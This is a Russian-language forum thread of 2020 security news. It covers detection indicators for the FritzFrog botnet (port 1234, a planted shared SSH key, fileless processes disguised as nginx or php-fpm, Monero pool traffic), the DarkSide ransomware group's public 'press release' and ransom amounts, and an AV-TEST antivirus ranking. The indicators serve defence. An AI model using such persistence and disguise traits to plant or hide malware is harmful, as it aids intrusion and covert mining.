Для выявления FritzFrog исследователями предложен простой shell-скрипт. Для определения поражения системы могут использоваться такие признаки как наличие слушающего соединения на порту 1234, присутствие вредоносного ключа в authorized_keys (на всех узлы устанавливается одинаковый SSH-ключ) и присутствие в памяти запущенных процессов "ifconfig", "libexec", "php-fpm" и "nginx", не имеющих связанных исполняемых файлов ("/proc/<PID>/exe" указывает на удалённый файл). Признаком также может служить наличие трафика на сетевой порт 5555, возникающего при обращении вредоносного ПО к типовому пулу web.xmrpool.eu в процессе майнинга криптовалюты Monero.

student

  • Супермодератор
  • Аксакал
  • *****
  • Спасибо
  • -> Вы поблагодарили: 38529
  • -> Вас поблагодарили: 36355
  • Сообщений: 16384
  • Респект: +2308/-0
Все новости о вирусах и антивирусах
« Ответ #388 : 26 Август 2020, 20:31:15 »
Полку шифровальщиков прибыло

На «рынке» зловредов-шифровальщиков появился новый крупный игрок. Ориентировочно 10 августа ранее неизвестная киберпреступная группировка начала атаковать крупные компании, используя новое вредоносное ПО DarkSide. А в конце прошлой недели операторы DarkSide решили официально заявить о себе. По понятным причинам они на стали проводить презентацию, однако распространили «пресс-релиз», составленный по всем законам жанра.

Спойлер   :
«Мы представляем новый продукт на рынке. Но это не значит, что мы не обладаем достаточным опытом и пришли из ниоткуда. Мы успели заработать миллионы долларов, участвуя в операциях других известных шифровальщиков. Однако ни один из этих продуктов не отвечал нашим нуждам в полной мере. И тогда мы решили объединить усилия, чтобы создать необходимый нам продукт», - говорится в распространенном операторами DarkSide заявлении. Далее в «пресс-релизе» утверждается, что группировка не ставит целью уничтожение чьего-либо бизнеса, а потому намерена атаковать лишь компании, способные уплатить требуемый выкуп. Перечислены также сферы, которые DarkSide не будет атаковать по принципиальным соображениям: к ним отнесены здравоохранение, образование, а также некоммерческие организации и правительственные учреждения.

Специалисты ресурса Bleeping Computer смогли связаться с несколькими компаниями, уже ставшими жертвами атак, и выяснить, что требуемая операторами DarkSide сумма выкупа варьируется от 200 тысяч до 2 миллионов долларов. Как минимум одна компания уже уплатила вымогателям более миллиона долларов. Требование выкупа, оказавшееся в распоряжении Bleeping Computer, почти аналогично требованию, используемому в атаках шифровальщика REvil (Sodinokibi), что наводит на мысль о возможной связи группировок.

vladimir1949

  • Эксперт
  • Аксакал
  • ****
  • Спасибо
  • -> Вы поблагодарили: 9543
  • -> Вас поблагодарили: 3487
  • Сообщений: 1119
  • Респект: +311/-0
Все новости о вирусах и антивирусах
« Ответ #389 : 22 Октябрь 2020, 18:11:57 »
Обновлён рейтинг лучших антивирусов для Windows 10

Microsoft Defender заработал высокую оценку

Независимая организация AV-TEST, оценивающая антивирусное программное обеспечение, составила рейтинг лучших антивирусов для Windows 10. Высокую оценку получила встроенная программа Microsoft Defender.

Спойлер   :
Microsoft Defender признают лучшим уже второй год подряд. AV-TEST оценивает антивирусное ПО по трём критериям: производительность, уровень защиты и удобство использования. Microsoft Defender получил отличные оценки во всех трёх категориях и вошёл в топ. Для исследования, кстати, AV-TEST использовала образцы ПО в период с июля по август 2020 года.

Встроенный антивирус Windows 10 не единственный, кто заработал высочайшую оценку. Вместе с ним упомянули Kaspersky, F-Secure, Avira, AhnLab, G Data и McAfee.

В таблице ниже можно увидеть и антивирусы, которые заработали меньше баллов.